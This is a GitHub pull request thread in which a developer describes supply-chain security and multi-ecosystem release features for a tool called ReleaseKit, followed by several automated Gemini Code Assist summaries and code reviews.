feat(releasekit): supply-chain security, multi-ecosystem orchestration, and CI hardening

[yesudeep]

feat(releasekit): supply-chain security, multi-ecosystem orchestration, and CI hardening

This PR transforms ReleaseKit from a Python-focused publish tool into a
comprehensive, multi-ecosystem release orchestrator with full supply-chain
security capabilities.

All ${{ inputs.* }} interpolation in CI workflow run: blocks is replaced
with env: var indirection to prevent GitHub Actions script injection (a
Critical-severity vulnerability). New modules add SLSA v1.0 provenance
generation, Sigstore keyless signing, PEP 740 attestations, CycloneDX/SPDX
SBOM generation, OSV vulnerability scanning, OpenSSF Scorecard integration,
and configurable trust/approval gates.

CI & Security Hardening

• Replace inline ${{ inputs.* }} with env vars in all workflow run: blocks
• Add provenance.py for SLSA v1.0 provenance attestations
• Add attestations: write permission and SBOM upload steps
• Add osv.py for OSV.dev vulnerability scanning
• Add security_insights.py for SECURITY-INSIGHTS.yml (OpenSSF standard)
• Add scorecard.py for OpenSSF Scorecard integration
• Add trust.py for configurable trust/approval gates
• Add security checks 12-14 in rk_security_test.py

New Modules

• announce.py: post-release notifications (Slack, Discord, repo dispatch)
• api.py: programmatic Python API for ReleaseKit operations
• attestations.py: artifact attestation generation and verification
• calver.py: calendar versioning (CalVer) support
• changesets.py: changeset-based versioning
• channels.py: release channels (stable, beta, nightly, canary)
• compliance.py: license compliance and policy enforcement
• hooks.py: lifecycle hooks (pre/post publish, prepare, release)
• hotfix.py: hotfix workflow for cherry-pick releases
• prerelease.py: prerelease version management (rc, beta, alpha)
• should_release.py: smart release gating (commit analysis, path filtering)
• snapshot.py: snapshot/dev version publishing
• commit_parsing/_angular.py: Angular commit convention parser

Validation Backend (backends/validation/)

• attestation.py, jwks.py, oidc.py, provenance.py, runner.py
• sbom.py, schema.py, slsa.py

Reusable Composite Action

• action.yml rewritten as universal composite GitHub Action
• All inputs passed via env vars (injection-safe)
• Structured outputs: exit code, release URL, PR URL, first tag, plan JSON
• Job Summary with rollback links
• Template workflows simplified to use the composite action

Documentation

• 20+ new guides (rollback, snapshots, SLSA, hooks, hotfix, channels, etc.)
• Roadmap moved and expanded
• CLI reference expanded with new commands
• New commit-formats.md and Reveal.js presentation

Other Changes

• py/pyproject.toml: PEP 8 inline comment spacing fix
• py/bin/fix_inline_imports.py: new AST-based fixer script
• py/GEMINI.md, releasekit/GEMINI.md: added security checks 12-14
• cli.py: _cmd_check converted to async; ~1000 lines of new CLI commands
• go.py, maven.py: enhanced for multi-ecosystem support
• New releasekit-rollback.yml template workflow
• framework-custom-evaluators LICENSE file added

Testing

• 30+ new test files covering all new modules
• All 16 security tests pass
• Linting and formatting pass

[gemini-code-assist]

Summary of Changes

Hello @yesudeep, I'm Gemini Code Assist¹! I'm currently reviewing this pull request and will post my feedback shortly. In the meantime, here's a summary to help you and other reviewers quickly get up to speed!

This pull request significantly enhances releasekit's ability to manage versions within Gradle-based projects by introducing support for gradle.properties and Gradle Version Catalogs. It also expands the tool's ecosystem compatibility to include Bazel and other JVM-related languages, making the continuous release process more comprehensive and reliable across a wider variety of project types.

Highlights

• Enhanced Gradle Version Management: Implemented new logic to read and write versions from gradle.properties (using VERSION_NAME) and Gradle Version Catalogs (libs.versions.toml), providing more robust version discovery and rewriting capabilities for Gradle projects.
• Improved Gradle Regex Parsing: Refined regular expressions for parsing Gradle versions, groups, and settings.gradle include directives, including support for Kotlin DSL and multi-include statements.
• Expanded Ecosystem Support: Added 'bazel' as a supported ecosystem and extended the MavenWorkspace backend to handle 'clojure', 'jvm', and 'kotlin' projects, broadening the range of projects releasekit can manage.
• New Gradle-Specific Tests: Introduced a dedicated test file (rk_workspace_gradle_test.py) to thoroughly validate the new Gradle version parsing and rewriting functionalities.

🧠 New Feature in Public Preview: You can now enable Memory to help Gemini Code Assist learn from your team's feedback. This makes future code reviews more consistent and personalized to your project's style. Click here to enable Memory in your admin console.

Changelog

• py/tools/releasekit/src/releasekit/backends/workspace/maven.py
  • Modified _GRADLE_VERSION_RE and _GRADLE_GROUP_RE regex to exclude whitespace from captured version/group strings.
  • Added _GRADLE_PROPS_VERSION_RE regex for parsing VERSION_NAME from gradle.properties.
  • Updated _SETTINGS_INCLUDE_RE regex to more broadly match project paths in settings.gradle files, supporting Kotlin DSL and multi-includes.
  • Introduced _read_gradle_properties_version and _write_gradle_properties_version functions for gradle.properties.
  • Added _read_version_catalog_version and _write_version_catalog_version functions for libs.versions.toml.
  • Updated _discover_gradle to fall back to gradle.properties and libs.versions.toml for version discovery if not found in build.gradle.
  • Modified rewrite_version to support version rewriting in gradle.properties and libs.versions.toml files.
• py/tools/releasekit/src/releasekit/config.py
  • Added 'bazel' to the list of ALLOWED_ECOSYSTEMS.
  • Added 'bazel' with 'bazel' as its default tool to DEFAULT_TOOLS.
• py/tools/releasekit/src/releasekit/workspace.py
  • Imported BazelWorkspace backend.
  • Updated the _ws_type type hint to include BazelWorkspace.
  • Expanded backend_map to include BazelWorkspace for 'bazel' and map 'clojure', 'jvm', and 'kotlin' to MavenWorkspace.
  • Updated discover_packages to include 'jvm', 'kotlin', 'clojure', and 'bazel' in the list of ecosystems handled by _discover_via_backend.
• py/tools/releasekit/tests/backends/rk_workspace_gradle_test.py
  • Added a new test file to cover Gradle-specific version handling, including gradle.properties and version catalogs.
  • Included tests for reading and writing versions in gradle.properties.
  • Added tests for reading and writing versions in libs.versions.toml (version catalog).
  • Implemented tests for parsing settings.gradle.kts with Kotlin DSL and multi-include syntax.
  • Provided tests for MavenWorkspace.discover() functionality with gradle.properties and version catalogs.
  • Added tests for MavenWorkspace.rewrite_version() with gradle.properties and version catalogs.

Using Gemini Code Assist

The full guide for Gemini Code Assist can be found on our documentation page, here are some quick tips.

Invoking Gemini

You can request assistance from Gemini at any point by creating a comment using either /gemini <command> or @gemini-code-assist <command>. Below is a summary of the supported commands on the current page.

Feature	Command	Description
Code Review	/gemini review	Performs a code review for the current pull request in its current state.
Pull Request Summary	/gemini summary	Provides a summary of the current pull request in its current state.
Comment	@gemini-code-assist	Responds in comments when explicitly tagged, both in pull request comments and review comments.
Help	/gemini help	Displays a list of available commands.

Customization

To customize Gemini Code Assist for GitHub experience, repository maintainers can create a configuration file and/or provide a custom code review style guide (such as PEP-8 for Python) by creating and adding files to a .gemini/ folder in the base of the repository. Detailed instructions can be found here.

Limitations & Feedback

Gemini Code Assist may make mistakes. Please leave feedback on any instances where its feedback is incorrect or counter productive. You can react with 👍 and 👎 on @gemini-code-assist comments. If you're interested in giving your feedback about your experience with Gemini Code Assist for Github and other Google products, sign up here.

You can also get AI-powered code generation, chat, as well as code reviews directly in the IDE at no cost with the Gemini Code Assist IDE Extension.

Footnotes

1. Review the Privacy Notices, Generative AI Prohibited Use Policy, Terms of Service, and learn how to configure Gemini Code Assist in GitHub here. Gemini can make mistakes, so double check it and use code with caution. ↩

[gemini-code-assist]

Code Review

This pull request enhances the release kit by adding support for continuous releases, particularly for Gradle projects. The changes include more robust version parsing from various Gradle files like gradle.properties and libs.versions.toml, and improved discovery of Gradle projects. Additionally, support for Bazel has been initiated. The new test file for Gradle-specific features is comprehensive and well-written. My review includes a few suggestions to improve the robustness of file parsing by using a dedicated library (tomlkit) for TOML files and by making regex patterns more resilient to comments in property files. These changes will help prevent potential bugs with different but valid file formats.

[yesudeep]

/gemini review

[gemini-code-assist]

Code Review

This is an impressive and extensive pull request that significantly enhances releasekit with a wide range of features for continuous releases, security, and multi-ecosystem support. The introduction of a programmatic API, a comprehensive validation framework, and support for changesets, CalVer, and release channels are all excellent additions. The refactoring of the GitHub Actions workflows to use a reusable composite action is a major improvement for maintainability and usability. The code is well-structured and the new documentation is thorough.

I have one critical security concern regarding command argument injection in a new utility script, and a minor comment about a misleading code comment. Other than that, the changes look solid.

[yesudeep]

/gemini review

[gemini-code-assist]

Code Review

This is a massive and impressive pull request that transforms releasekit into a comprehensive, multi-ecosystem release orchestration tool. The changes introduce a wide array of features for continuous releases, security compliance (SLSA, Sigstore, SBOMs), and operational robustness, including one-click rollbacks and detailed health checks. The addition of extensive documentation, a programmatic API, and a reusable GitHub Action are all excellent improvements. The overall quality of the code is very high. I have only found a couple of minor issues to address.

[yesudeep]

/gemini review

[gemini-code-assist]

Code Review

This is a massive and impressive PR that transforms ReleaseKit into a full-featured, multi-ecosystem release orchestrator with strong supply-chain security capabilities. The changes are well-structured, and the new features are extensively documented. The use of a composite action simplifies CI workflows significantly. My review focuses on a couple of minor improvements in the CI workflow implementation for better robustness and maintainability.